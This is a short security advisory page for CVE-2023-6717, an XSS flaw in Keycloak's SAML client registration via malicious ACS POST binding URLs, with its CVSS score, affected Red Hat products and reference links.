CVE-2023-6717
Keycloak: xss via assertion consumer service url in saml post-binding flow
A flaw was found in the SAML client registration in Keycloak that could allow an administrator to register malicious JavaScript URIs as Assertion Consumer Service POST Binding URLs (ACS), posing a Cross-Site Scripting (XSS) risk. This issue may allow a malicious admin in one realm or a client with registration access to target users in different realms or applications, executing arbitrary JavaScript in their contexts upon form submission. This can enable unauthorized access and harmful actions, compromising the confidentiality, integrity, and availability of the complete KC instance.
CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:L
Produtos afetados
keycloakRed Hat · Migration Toolkit for Applications 6Red Hat · Migration Toolkit for Applications 7Red Hat · Red Hat AMQ Broker 7Red Hat · Red Hat build of Apicurio Registry 2Red Hat · Red Hat build of Keycloak 22Red Hat · Red Hat build of Keycloak 22.0.10Red Hat · Red Hat build of QuarkusRed Hat · Red Hat Data Grid 8Red Hat · Red Hat Decision Manager 7Red Hat · Red Hat Developer HubRed Hat · Red Hat Fuse 7Red Hat · Red Hat JBoss Data Grid 7Red Hat · Red Hat JBoss Enterprise Application Platform 6Red Hat · Red Hat JBoss Enterprise Application Platform 7Red Hat · Red Hat JBoss Enterprise Application Platform 8Red Hat · Red Hat JBoss Enterprise Application Platform Expansion PackRed Hat · Red Hat OpenShift GitOpsRed Hat · Red Hat Process Automation 7Red Hat · Red Hat Single Sign-On 7Red Hat · RHOSS-1.33-RHEL-8Red Hat · RHPAM 7.13.5 asyncQuer saber se a sua infraestrutura está exposta a isto?
Falar com a TrueHacking →Referências
https://access.redhat.com/errata/RHSA-2024:1353https://access.redhat.com/errata/RHSA-2024:1867https://access.redhat.com/errata/RHSA-2024:1868https://access.redhat.com/errata/RHSA-2024:2945https://access.redhat.com/errata/RHSA-2024:4057https://access.redhat.com/security/cve/CVE-2023-6717https://bugzilla.redhat.com/show_bug.cgi?id=2253952